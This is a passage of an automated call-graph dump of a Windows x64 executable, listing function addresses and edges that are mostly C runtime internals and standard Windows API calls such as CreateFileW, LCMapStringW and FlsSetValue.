16827 7ff640504452 16823->16827 16824->16808 16825 7ff6404f43f4 11 API calls _get_daylight 16825->16833 16826 7ff6404f43f4 11 API calls _get_daylight 16826->16831 16827->16822 16829 7ff640502f20 37 API calls 16827->16829 16832 7ff64050464c memcpy_s 37 API calls 16827->16832 16828 7ff6404f9bf0 37 API calls _invalid_parameter_noinfo 16828->16831 16829->16827 16830 7ff6404f9bf0 37 API calls _invalid_parameter_noinfo 16830->16833 16831->16821 16831->16826 16831->16828 16832->16827 16833->16815 16833->16821 16833->16825 16833->16830 16835 7ff640502e23 16834->16835 16836 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16835->16836 16837 7ff640502e4e memcpy_s 16835->16837 16836->16837 16837->16760 16839 7ff6404fd4e8 memcpy_s 16838->16839 16840 7ff6404f3ae0 45 API calls 16839->16840 16841 7ff6404fd5a2 memcpy_s 16839->16841 16840->16841 16841->16765 16843 7ff6404fd23b 16842->16843 16848 7ff6404fd288 memcpy_s 16842->16848 16844 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16843->16844 16845 7ff6404fd267 16844->16845 16845->16765 16846 7ff6404fd2f3 16847 7ff6404f97b4 __std_exception_copy 37 API calls 16846->16847 16852 7ff6404fd335 memcpy_s 16847->16852 16848->16846 16849 7ff6404f3ae0 45 API calls 16848->16849 16849->16846 16850 7ff6404f9c10 _isindst 17 API calls 16851 7ff6404fd3e0 16850->16851 16852->16850 16854 7ff640507159 16853->16854 16858 7ff64050717a 16853->16858 16855 7ff6404f43f4 _get_daylight 11 API calls 16854->16855 16856 7ff64050716e 16855->16856 16857 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16856->16857 16857->16858 16858->16795 16860 7ff640507630 16859->16860 16865 7ff640507347 16859->16865 16861 7ff6405075e0 16862 7ff6405075d6 16861->16862 16867 7ff6405088f0 _log10_special 20 API calls 16861->16867 16862->16813 16863 7ff6405075c2 16866 7ff6405088f0 _log10_special 20 API calls 16863->16866 16864 7ff6405073af 16864->16813 16865->16861 16865->16863 16865->16864 16866->16862 16867->16862 16872 7ff640504669 memcpy_s 16868->16872 16873 7ff64050466d memcpy_s 16868->16873 16869 7ff640504672 16870 7ff6404f43f4 _get_daylight 11 API calls 16869->16870 16871 7ff640504677 16870->16871 16874 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16871->16874 16872->16815 16873->16869 16873->16872 16875 7ff6405046ad 16873->16875 16874->16872 16875->16872 16876 7ff6404f43f4 _get_daylight 11 API calls 16875->16876 16876->16871 16878 7ff640502f48 16877->16878 16886 7ff640502f8b 16877->16886 16879 7ff640502f92 16878->16879 16880 7ff640502f6c 16878->16880 16878->16886 16882 7ff640502fd4 16879->16882 16883 7ff640502f97 16879->16883 16881 7ff64050464c memcpy_s 37 API calls 16880->16881 16881->16886 16885 7ff64050464c memcpy_s 37 API calls 16882->16885 16884 7ff64050464c memcpy_s 37 API calls 16883->16884 16884->16886 16885->16886 16886->16823 16886->16827 16889 7ff6404ffb1c WideCharToMultiByte 16887->16889 16891 7ff6404f0073 16890->16891 16892 7ff6404f0061 16890->16892 16895 7ff6404f0080 16891->16895 16898 7ff6404f00bd 16891->16898 16893 7ff6404f43f4 _get_daylight 11 API calls 16892->16893 16894 7ff6404f0066 16893->16894 16896 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16894->16896 16897 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16895->16897 16904 7ff6404f0071 16896->16904 16897->16904 16899 7ff6404f0166 16898->16899 16901 7ff6404f43f4 _get_daylight 11 API calls 16898->16901 16900 7ff6404f43f4 _get_daylight 11 API calls 16899->16900 16899->16904 16903 7ff6404f0210 16900->16903 16902 7ff6404f015b 16901->16902 16905 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16902->16905 16906 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16903->16906 16904->16597 16905->16899 16906->16904 16908 7ff6404fcce1 16907->16908 16910 7ff6404f3b1f 16907->16910 16909 7ff640502614 45 API calls 16908->16909 16908->16910 16909->16910 16911 7ff6404fcd34 16910->16911 16912 7ff6404fcd4d 16911->16912 16914 7ff6404f3b2f 16911->16914 16913 7ff640501960 45 API calls 16912->16913 16912->16914 16913->16914 16914->16597 16919 7ff6404fdf4d 16915->16919 16916 7ff6404fdf52 16917 7ff6404f44fd 16916->16917 16918 7ff6404f43f4 _get_daylight 11 API calls 16916->16918 16917->16580 16917->16587 16920 7ff6404fdf5c 16918->16920 16919->16916 16919->16917 16922 7ff6404fdf9c 16919->16922 16921 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16920->16921 16921->16917 16922->16917 16923 7ff6404f43f4 _get_daylight 11 API calls 16922->16923 16923->16920 16925 7ff6404ef6d4 16924->16925 16926 7ff6404ef706 16924->16926 16925->15804 16926->16925 16927 7ff6404ef715 memcpy_s 16926->16927 16928 7ff6404ef752 16926->16928 16930 7ff6404f43f4 _get_daylight 11 API calls 16927->16930 16937 7ff6404f477c EnterCriticalSection 16928->16937 16932 7ff6404ef72a 16930->16932 16934 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 16932->16934 16934->16925 16939 7ff6404ebe12 RtlLookupFunctionEntry 16938->16939 16940 7ff6404ebc2b 16939->16940 16941 7ff6404ebe28 RtlVirtualUnwind 16939->16941 16942 7ff6404ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16940->16942 16941->16939 16941->16940 16962 7ff6404ebb70 16943->16962 16946 7ff6404e2355 memcpy_s 16964 7ff6404e2530 16946->16964 16948 7ff6404e239b memcpy_s 16968 7ff6404f6c7c 16948->16968 16951 7ff6404f6c7c 37 API calls 16952 7ff6404e23ce 16951->16952 16953 7ff6404f6c7c 37 API calls 16952->16953 16954 7ff6404e23db DialogBoxIndirectParamW 16953->16954 16955 7ff6404e2411 __vcrt_freefls 16954->16955 16956 7ff6404e2431 DeleteObject 16955->16956 16957 7ff6404e2437 16955->16957 16956->16957 16958 7ff6404e2443 DestroyIcon 16957->16958 16959 7ff6404e2449 16957->16959 16958->16959 16960 7ff6404eb870 _log10_special 8 API calls 16959->16960 16961 7ff6404e245a 16960->16961 16961->15851 16963 7ff6404e2319 GetModuleHandleW 16962->16963 16963->16946 16965 7ff6404e2555 16964->16965 16975 7ff6404f3ef8 16965->16975 16969 7ff6404e23c1 16968->16969 16970 7ff6404f6c9a 16968->16970 16969->16951 16970->16969 17169 7ff6404ff784 16970->17169 16973 7ff6404f9c10 _isindst 17 API calls 16974 7ff6404f6cfd 16973->16974 16976 7ff6404f3f52 16975->16976 16977 7ff6404f3f77 16976->16977 16978 7ff6404f3fb3 16976->16978 16979 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16977->16979 16993 7ff6404f22b0 16978->16993 16981 7ff6404f3fa1 16979->16981 16982 7ff6404eb870 _log10_special 8 API calls 16981->16982 16985 7ff6404e2574 16982->16985 16983 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16983->16981 16985->16948 16986 7ff6404f4094 16986->16983 16987 7ff6404f40ba 16987->16986 16990 7ff6404f40c4 16987->16990 16988 7ff6404f4069 16991 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16988->16991 16989 7ff6404f4060 16989->16986 16989->16988 16992 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16990->16992 16991->16981 16992->16981 16994 7ff6404f22ee 16993->16994 16995 7ff6404f22de 16993->16995 16996 7ff6404f22f7 16994->16996 17002 7ff6404f2325 16994->17002 16997 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16995->16997 16998 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 16996->16998 16999 7ff6404f231d 16997->16999 16998->16999 16999->16986 16999->16987 16999->16988 16999->16989 17002->16995 17002->16999 17004 7ff6404f2cc4 17002->17004 17037 7ff6404f2710 17002->17037 17074 7ff6404f1ea0 17002->17074 17005 7ff6404f2d06 17004->17005 17006 7ff6404f2d77 17004->17006 17007 7ff6404f2da1 17005->17007 17008 7ff6404f2d0c 17005->17008 17009 7ff6404f2dd0 17006->17009 17010 7ff6404f2d7c 17006->17010 17093 7ff6404f1074 17007->17093 17013 7ff6404f2d40 17008->17013 17014 7ff6404f2d11 17008->17014 17016 7ff6404f2dda 17009->17016 17017 7ff6404f2de7 17009->17017 17021 7ff6404f2ddf 17009->17021 17011 7ff6404f2db1 17010->17011 17012 7ff6404f2d7e 17010->17012 17100 7ff6404f0c64 17011->17100 17015 7ff6404f2d20 17012->17015 17024 7ff6404f2d8d 17012->17024 17019 7ff6404f2d17 17013->17019 17013->17021 17014->17017 17014->17019 17035 7ff6404f2e10 17015->17035 17077 7ff6404f3478 17015->17077 17016->17007 17016->17021 17107 7ff6404f39cc 17017->17107 17019->17015 17025 7ff6404f2d52 17019->17025 17032 7ff6404f2d3b 17019->17032 17021->17035 17111 7ff6404f1484 17021->17111 17024->17007 17027 7ff6404f2d92 17024->17027 17025->17035 17087 7ff6404f37b4 17025->17087 17030 7ff6404f3878 37 API calls 17027->17030 17027->17035 17029 7ff6404eb870 _log10_special 8 API calls 17031 7ff6404f310a 17029->17031 17030->17032 17031->17002 17033 7ff6404f3ae0 45 API calls 17032->17033 17032->17035 17036 7ff6404f2ffc 17032->17036 17033->17036 17035->17029 17036->17035 17118 7ff6404fdd18 17036->17118 17038 7ff6404f2734 17037->17038 17039 7ff6404f271e 17037->17039 17040 7ff6404f2774 17038->17040 17043 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17038->17043 17039->17040 17041 7ff6404f2d06 17039->17041 17042 7ff6404f2d77 17039->17042 17040->17002 17044 7ff6404f2da1 17041->17044 17045 7ff6404f2d0c 17041->17045 17046 7ff6404f2dd0 17042->17046 17047 7ff6404f2d7c 17042->17047 17043->17040 17055 7ff6404f1074 38 API calls 17044->17055 17050 7ff6404f2d40 17045->17050 17051 7ff6404f2d11 17045->17051 17053 7ff6404f2dda 17046->17053 17054 7ff6404f2de7 17046->17054 17059 7ff6404f2ddf 17046->17059 17048 7ff6404f2db1 17047->17048 17049 7ff6404f2d7e 17047->17049 17057 7ff6404f0c64 38 API calls 17048->17057 17052 7ff6404f2d20 17049->17052 17061 7ff6404f2d8d 17049->17061 17056 7ff6404f2d17 17050->17056 17050->17059 17051->17054 17051->17056 17058 7ff6404f3478 47 API calls 17052->17058 17073 7ff6404f2e10 17052->17073 17053->17044 17053->17059 17060 7ff6404f39cc 45 API calls 17054->17060 17069 7ff6404f2d3b 17055->17069 17056->17052 17062 7ff6404f2d52 17056->17062 17056->17069 17057->17069 17058->17069 17063 7ff6404f1484 38 API calls 17059->17063 17059->17073 17060->17069 17061->17044 17064 7ff6404f2d92 17061->17064 17065 7ff6404f37b4 46 API calls 17062->17065 17062->17073 17063->17069 17067 7ff6404f3878 37 API calls 17064->17067 17064->17073 17065->17069 17066 7ff6404eb870 _log10_special 8 API calls 17068 7ff6404f310a 17066->17068 17067->17069 17068->17002 17070 7ff6404f3ae0 45 API calls 17069->17070 17072 7ff6404f2ffc 17069->17072 17069->17073 17070->17072 17071 7ff6404fdd18 46 API calls 17071->17072 17072->17071 17072->17073 17073->17066 17152 7ff6404f02e8 17074->17152 17078 7ff6404f349e 17077->17078 17079 7ff6404efea0 12 API calls 17078->17079 17080 7ff6404f34ee 17079->17080 17081 7ff6404fd880 46 API calls 17080->17081 17082 7ff6404f35c1 17081->17082 17083 7ff6404f35e3 17082->17083 17084 7ff6404f3ae0 45 API calls 17082->17084 17085 7ff6404f3ae0 45 API calls 17083->17085 17086 7ff6404f3671 17083->17086 17084->17083 17085->17086 17086->17032 17088 7ff6404f37e9 17087->17088 17089 7ff6404f3807 17088->17089 17090 7ff6404f3ae0 45 API calls 17088->17090 17092 7ff6404f382e 17088->17092 17091 7ff6404fdd18 46 API calls 17089->17091 17090->17089 17091->17092 17092->17032 17094 7ff6404f10a7 17093->17094 17095 7ff6404f10d6 17094->17095 17097 7ff6404f1193 17094->17097 17099 7ff6404f1113 17095->17099 17130 7ff6404eff48 17095->17130 17098 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17097->17098 17098->17099 17099->17032 17101 7ff6404f0c97 17100->17101 17102 7ff6404f0cc6 17101->17102 17104 7ff6404f0d83 17101->17104 17103 7ff6404eff48 12 API calls 17102->17103 17106 7ff6404f0d03 17102->17106 17103->17106 17105 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17104->17105 17105->17106 17106->17032 17108 7ff6404f3a0f 17107->17108 17110 7ff6404f3a13 __crtLCMapStringW 17108->17110 17138 7ff6404f3a68 17108->17138 17110->17032 17112 7ff6404f14b7 17111->17112 17113 7ff6404f14e6 17112->17113 17115 7ff6404f15a3 17112->17115 17114 7ff6404eff48 12 API calls 17113->17114 17117 7ff6404f1523 17113->17117 17114->17117 17116 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17115->17116 17116->17117 17117->17032 17119 7ff6404fdd49 17118->17119 17125 7ff6404fdd57 17118->17125 17120 7ff6404fdd77 17119->17120 17121 7ff6404f3ae0 45 API calls 17119->17121 17119->17125 17122 7ff6404fddaf 17120->17122 17123 7ff6404fdd88 17120->17123 17121->17120 17122->17125 17126 7ff6404fde3a 17122->17126 17127 7ff6404fddd9 17122->17127 17142 7ff6404ff3b0 17123->17142 17125->17036 17128 7ff6404febb0 _fread_nolock MultiByteToWideChar 17126->17128 17127->17125 17145 7ff6404febb0 17127->17145 17128->17125 17131 7ff6404eff6e 17130->17131 17132 7ff6404eff7f 17130->17132 17131->17099 17132->17131 17133 7ff6404fc90c _fread_nolock 12 API calls 17132->17133 17134 7ff6404effb0 17133->17134 17135 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17134->17135 17137 7ff6404effc4 17134->17137 17135->17137 17136 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17136->17131 17137->17136 17139 7ff6404f3a8e 17138->17139 17140 7ff6404f3a86 17138->17140 17139->17110 17141 7ff6404f3ae0 45 API calls 17140->17141 17141->17139 17148 7ff640506098 17142->17148 17146 7ff6404febb9 MultiByteToWideChar 17145->17146 17151 7ff6405060fc 17148->17151 17149 7ff6404eb870 _log10_special 8 API calls 17150 7ff6404ff3cd 17149->17150 17150->17125 17151->17149 17153 7ff6404f032f 17152->17153 17154 7ff6404f031d 17152->17154 17157 7ff6404f033d 17153->17157 17161 7ff6404f0379 17153->17161 17155 7ff6404f43f4 _get_daylight 11 API calls 17154->17155 17156 7ff6404f0322 17155->17156 17158 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17156->17158 17159 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17157->17159 17166 7ff6404f032d 17158->17166 17159->17166 17160 7ff6404f06f5 17162 7ff6404f43f4 _get_daylight 11 API calls 17160->17162 17160->17166 17161->17160 17163 7ff6404f43f4 _get_daylight 11 API calls 17161->17163 17164 7ff6404f0989 17162->17164 17165 7ff6404f06ea 17163->17165 17167 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17164->17167 17168 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17165->17168 17166->17002 17167->17166 17168->17160 17170 7ff6404ff791 17169->17170 17171 7ff6404ff79b 17169->17171 17170->17171 17176 7ff6404ff7b7 17170->17176 17172 7ff6404f43f4 _get_daylight 11 API calls 17171->17172 17173 7ff6404ff7a3 17172->17173 17174 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17173->17174 17175 7ff6404f6cc9 17174->17175 17175->16969 17175->16973 17176->17175 17177 7ff6404f43f4 _get_daylight 11 API calls 17176->17177 17177->17173 19452 7ff6404e95fb 19455 7ff6404e9601 19452->19455 19453 7ff6404eb0b0 12 API calls 19454 7ff6404e9eb6 19453->19454 19455->19453 19455->19454 18561 7ff6404f8c79 18562 7ff6404f96e8 45 API calls 18561->18562 18563 7ff6404f8c7e 18562->18563 18564 7ff6404f8ca5 GetModuleHandleW 18563->18564 18565 7ff6404f8cef 18563->18565 18564->18565 18571 7ff6404f8cb2 18564->18571 18573 7ff6404f8b7c 18565->18573 18571->18565 18587 7ff6404f8da0 GetModuleHandleExW 18571->18587 18593 7ff6404ff5e8 EnterCriticalSection 18573->18593 18588 7ff6404f8dd4 GetProcAddress 18587->18588 18589 7ff6404f8dfd 18587->18589 18592 7ff6404f8de6 18588->18592 18590 7ff6404f8e02 FreeLibrary 18589->18590 18591 7ff6404f8e09 18589->18591 18590->18591 18591->18565 18592->18589 19456 7ff640506f30 19459 7ff640501900 19456->19459 19460 7ff64050190d 19459->19460 19461 7ff640501952 19459->19461 19465 7ff6404fa534 19460->19465 19466 7ff6404fa545 FlsGetValue 19465->19466 19467 7ff6404fa560 FlsSetValue 19465->19467 19468 7ff6404fa552 19466->19468 19469 7ff6404fa55a 19466->19469 19467->19468 19470 7ff6404fa56d 19467->19470 19471 7ff6404fa558 19468->19471 19472 7ff6404f9814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19468->19472 19469->19467 19473 7ff6404fdea8 _get_daylight 11 API calls 19470->19473 19485 7ff6405015d4 19471->19485 19475 7ff6404fa5d5 19472->19475 19474 7ff6404fa57c 19473->19474 19476 7ff6404fa59a FlsSetValue 19474->19476 19477 7ff6404fa58a FlsSetValue 19474->19477 19479 7ff6404fa5b8 19476->19479 19480 7ff6404fa5a6 FlsSetValue 19476->19480 19478 7ff6404fa593 19477->19478 19481 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19478->19481 19482 7ff6404fa204 _get_daylight 11 API calls 19479->19482 19480->19478 19481->19468 19483 7ff6404fa5c0 19482->19483 19484 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19483->19484 19484->19471 19508 7ff640501844 19485->19508 19487 7ff640501609 19523 7ff6405012d4 19487->19523 19490 7ff640501626 19490->19461 19491 7ff6404fc90c _fread_nolock 12 API calls 19492 7ff640501637 19491->19492 19493 7ff64050163f 19492->19493 19495 7ff64050164e 19492->19495 19494 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19493->19494 19494->19490 19495->19495 19530 7ff64050197c 19495->19530 19498 7ff64050174a 19499 7ff6404f43f4 _get_daylight 11 API calls 19498->19499 19500 7ff64050174f 19499->19500 19502 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19500->19502 19501 7ff6405017a5 19504 7ff64050180c 19501->19504 19541 7ff640501104 19501->19541 19502->19490 19503 7ff640501764 19503->19501 19506 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19503->19506 19505 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19504->19505 19505->19490 19506->19501 19509 7ff640501867 19508->19509 19510 7ff640501871 19509->19510 19556 7ff6404ff5e8 EnterCriticalSection 19509->19556 19512 7ff6405018e3 19510->19512 19515 7ff6404f9814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19510->19515 19512->19487 19516 7ff6405018fb 19515->19516 19518 7ff640501952 19516->19518 19520 7ff6404fa534 50 API calls 19516->19520 19518->19487 19521 7ff64050193c 19520->19521 19522 7ff6405015d4 65 API calls 19521->19522 19522->19518 19524 7ff6404f4178 45 API calls 19523->19524 19525 7ff6405012e8 19524->19525 19526 7ff6405012f4 GetOEMCP 19525->19526 19527 7ff640501306 19525->19527 19528 7ff64050131b 19526->19528 19527->19528 19529 7ff64050130b GetACP 19527->19529 19528->19490 19528->19491 19529->19528 19531 7ff6405012d4 47 API calls 19530->19531 19532 7ff6405019a9 19531->19532 19533 7ff640501aff 19532->19533 19534 7ff6405019e6 IsValidCodePage 19532->19534 19540 7ff640501a00 memcpy_s 19532->19540 19535 7ff6404eb870 _log10_special 8 API calls 19533->19535 19534->19533 19536 7ff6405019f7 19534->19536 19537 7ff640501741 19535->19537 19538 7ff640501a26 GetCPInfo 19536->19538 19536->19540 19537->19498 19537->19503 19538->19533 19538->19540 19557 7ff6405013ec 19540->19557 19613 7ff6404ff5e8 EnterCriticalSection 19541->19613 19558 7ff640501429 GetCPInfo 19557->19558 19567 7ff64050151f 19557->19567 19563 7ff64050143c 19558->19563 19558->19567 19559 7ff6404eb870 _log10_special 8 API calls 19560 7ff6405015be 19559->19560 19560->19533 19561 7ff640502150 48 API calls 19562 7ff6405014b3 19561->19562 19568 7ff640506e94 19562->19568 19563->19561 19566 7ff640506e94 54 API calls 19566->19567 19567->19559 19569 7ff6404f4178 45 API calls 19568->19569 19570 7ff640506eb9 19569->19570 19573 7ff640506b60 19570->19573 19574 7ff640506ba1 19573->19574 19575 7ff6404febb0 _fread_nolock MultiByteToWideChar 19574->19575 19578 7ff640506beb 19575->19578 19576 7ff640506e69 19577 7ff6404eb870 _log10_special 8 API calls 19576->19577 19579 7ff6405014e6 19577->19579 19578->19576 19580 7ff6404fc90c _fread_nolock 12 API calls 19578->19580 19582 7ff640506c23 19578->19582 19593 7ff640506d21 19578->19593 19579->19566 19580->19582 19581 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19581->19576 19583 7ff6404febb0 _fread_nolock MultiByteToWideChar 19582->19583 19582->19593 19584 7ff640506c96 19583->19584 19584->19593 19604 7ff6404fe3f4 19584->19604 19587 7ff640506d32 19589 7ff640506e04 19587->19589 19590 7ff6404fc90c _fread_nolock 12 API calls 19587->19590 19592 7ff640506d50 19587->19592 19588 7ff640506ce1 19591 7ff6404fe3f4 __crtLCMapStringW 6 API calls 19588->19591 19588->19593 19589->19593 19594 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19589->19594 19590->19592 19591->19593 19592->19593 19595 7ff6404fe3f4 __crtLCMapStringW 6 API calls 19592->19595 19593->19576 19593->19581 19594->19593 19596 7ff640506dd0 19595->19596 19596->19589 19597 7ff640506df0 19596->19597 19598 7ff640506e06 19596->19598 19600 7ff6404ffaf8 WideCharToMultiByte 19597->19600 19599 7ff6404ffaf8 WideCharToMultiByte 19598->19599 19601 7ff640506dfe 19599->19601 19600->19601 19601->19589 19602 7ff640506e1e 19601->19602 19602->19593 19603 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19602->19603 19603->19593 19605 7ff6404fe020 __crtLCMapStringW 5 API calls 19604->19605 19606 7ff6404fe432 19605->19606 19607 7ff6404fe43a 19606->19607 19610 7ff6404fe4e0 19606->19610 19607->19587 19607->19588 19607->19593 19609 7ff6404fe4a3 LCMapStringW 19609->19607 19611 7ff6404fe020 __crtLCMapStringW 5 API calls 19610->19611 19612 7ff6404fe50e __crtLCMapStringW 19611->19612 19612->19609 19614 7ff6404fb830 19625 7ff6404ff5e8 EnterCriticalSection 19614->19625 19649 7ff6404eaa2c 19650 7ff6404e9e33 19649->19650 19652 7ff6404e9eb6 19649->19652 19651 7ff6404eb0b0 12 API calls 19650->19651 19650->19652 19651->19652 19653 7ff6404f4720 19654 7ff6404f472b 19653->19654 19662 7ff6404fe5b4 19654->19662 19675 7ff6404ff5e8 EnterCriticalSection 19662->19675 19680 7ff64050a10e 19681 7ff64050a11d 19680->19681 19683 7ff64050a127 19680->19683 19684 7ff6404ff648 LeaveCriticalSection 19681->19684 19145 7ff6404fec9c 19146 7ff6404fee8e 19145->19146 19148 7ff6404fecde _isindst 19145->19148 19147 7ff6404f43f4 _get_daylight 11 API calls 19146->19147 19165 7ff6404fee7e 19147->19165 19148->19146 19151 7ff6404fed5e _isindst 19148->19151 19149 7ff6404eb870 _log10_special 8 API calls 19150 7ff6404feea9 19149->19150 19166 7ff6405054a4 19151->19166 19156 7ff6404feeba 19157 7ff6404f9c10 _isindst 17 API calls 19156->19157 19159 7ff6404feece 19157->19159 19163 7ff6404fedbb 19163->19165 19191 7ff6405054e8 19163->19191 19165->19149 19167 7ff6405054b3 19166->19167 19168 7ff6404fed7c 19166->19168 19198 7ff6404ff5e8 EnterCriticalSection 19167->19198 19173 7ff6405048a8 19168->19173 19174 7ff6405048b1 19173->19174 19175 7ff6404fed91 19173->19175 19176 7ff6404f43f4 _get_daylight 11 API calls 19174->19176 19175->19156 19179 7ff6405048d8 19175->19179 19177 7ff6405048b6 19176->19177 19178 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19177->19178 19178->19175 19180 7ff6405048e1 19179->19180 19181 7ff6404feda2 19179->19181 19182 7ff6404f43f4 _get_daylight 11 API calls 19180->19182 19181->19156 19185 7ff640504908 19181->19185 19183 7ff6405048e6 19182->19183 19184 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19183->19184 19184->19181 19186 7ff640504911 19185->19186 19187 7ff6404fedb3 19185->19187 19188 7ff6404f43f4 _get_daylight 11 API calls 19186->19188 19187->19156 19187->19163 19189 7ff640504916 19188->19189 19190 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19189->19190 19190->19187 19199 7ff6404ff5e8 EnterCriticalSection 19191->19199 19695 7ff6404e9fcd 19697 7ff6404e9fd2 19695->19697 19696 7ff6404eb0b0 12 API calls 19700 7ff6404e9eb6 19696->19700 19697->19697 19702 7ff6404ea13a 19697->19702 19704 7ff6404e9ca3 19697->19704 19705 7ff6404eb1d0 19697->19705 19699 7ff6404eb1d0 12 API calls 19701 7ff6404ea448 19699->19701 19703 7ff6404eb1d0 12 API calls 19701->19703 19702->19699 19702->19704 19703->19704 19704->19696 19704->19700 19712 7ff6404eb220 19705->19712 19706 7ff6404eb765 19713 7ff6404ebcd4 19706->19713 19709 7ff6404eb2d9 19710 7ff6404eb870 _log10_special 8 API calls 19709->19710 19711 7ff6404eb511 19710->19711 19711->19702 19712->19706 19712->19709 19716 7ff6404ebce8 IsProcessorFeaturePresent 19713->19716 19717 7ff6404ebcff 19716->19717 19722 7ff6404ebd88 RtlCaptureContext RtlLookupFunctionEntry 19717->19722 19723 7ff6404ebd13 19722->19723 19724 7ff6404ebdb8 RtlVirtualUnwind 19722->19724 19725 7ff6404ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19723->19725 19724->19723 19749 7ff6405009c0 19760 7ff6405066f4 19749->19760 19761 7ff640506701 19760->19761 19762 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19761->19762 19763 7ff64050671d 19761->19763 19762->19761 19764 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19763->19764 19765 7ff6405009c9 19763->19765 19764->19763 19766 7ff6404ff5e8 EnterCriticalSection 19765->19766 17178 7ff6404eab3c 17180 7ff6404e9e3a 17178->17180 17179 7ff6404e9eb6 17180->17179 17182 7ff6404eb0b0 17180->17182 17183 7ff6404eb0d3 17182->17183 17184 7ff6404eb0f1 memcpy_s 17182->17184 17185 7ff6404fc90c 12 API calls 17183->17185 17184->17179 17185->17184 18613 7ff6404f4938 18614 7ff6404f4952 18613->18614 18615 7ff6404f496f 18613->18615 18616 7ff6404f43d4 _fread_nolock 11 API calls 18614->18616 18615->18614 18617 7ff6404f4982 CreateFileW 18615->18617 18618 7ff6404f4957 18616->18618 18619 7ff6404f49ec 18617->18619 18620 7ff6404f49b6 18617->18620 18622 7ff6404f43f4 _get_daylight 11 API calls 18618->18622 18664 7ff6404f4f14 18619->18664 18638 7ff6404f4a8c GetFileType 18620->18638 18625 7ff6404f495f 18622->18625 18631 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18625->18631 18627 7ff6404f49e1 CloseHandle 18632 7ff6404f496a 18627->18632 18628 7ff6404f49cb CloseHandle 18628->18632 18629 7ff6404f49f5 18633 7ff6404f4368 _fread_nolock 11 API calls 18629->18633 18630 7ff6404f4a20 18685 7ff6404f4cd4 18630->18685 18631->18632 18637 7ff6404f49ff 18633->18637 18637->18632 18639 7ff6404f4ada 18638->18639 18640 7ff6404f4b97 18638->18640 18641 7ff6404f4b06 GetFileInformationByHandle 18639->18641 18645 7ff6404f4e10 21 API calls 18639->18645 18642 7ff6404f4bc1 18640->18642 18643 7ff6404f4b9f 18640->18643 18646 7ff6404f4bb2 GetLastError 18641->18646 18647 7ff6404f4b2f 18641->18647 18644 7ff6404f4be4 PeekNamedPipe 18642->18644 18654 7ff6404f4b82 18642->18654 18643->18646 18648 7ff6404f4ba3 18643->18648 18644->18654 18649 7ff6404f4af4 18645->18649 18652 7ff6404f4368 _fread_nolock 11 API calls 18646->18652 18650 7ff6404f4cd4 51 API calls 18647->18650 18651 7ff6404f43f4 _get_daylight 11 API calls 18648->18651 18649->18641 18649->18654 18655 7ff6404f4b3a 18650->18655 18651->18654 18652->18654 18653 7ff6404eb870 _log10_special 8 API calls 18656 7ff6404f49c4 18653->18656 18654->18653 18702 7ff6404f4c34 18655->18702 18656->18627 18656->18628 18659 7ff6404f4c34 10 API calls 18660 7ff6404f4b59 18659->18660 18661 7ff6404f4c34 10 API calls 18660->18661 18662 7ff6404f4b6a 18661->18662 18662->18654 18663 7ff6404f43f4 _get_daylight 11 API calls 18662->18663 18663->18654 18665 7ff6404f4f4a 18664->18665 18666 7ff6404f4fe2 __vcrt_freefls 18665->18666 18667 7ff6404f43f4 _get_daylight 11 API calls 18665->18667 18668 7ff6404eb870 _log10_special 8 API calls 18666->18668 18669 7ff6404f4f5c 18667->18669 18670 7ff6404f49f1 18668->18670 18671 7ff6404f43f4 _get_daylight 11 API calls 18669->18671 18670->18629 18670->18630 18672 7ff6404f4f64 18671->18672 18673 7ff6404f7118 45 API calls 18672->18673 18674 7ff6404f4f79 18673->18674 18675 7ff6404f4f81 18674->18675 18676 7ff6404f4f8b 18674->18676 18677 7ff6404f43f4 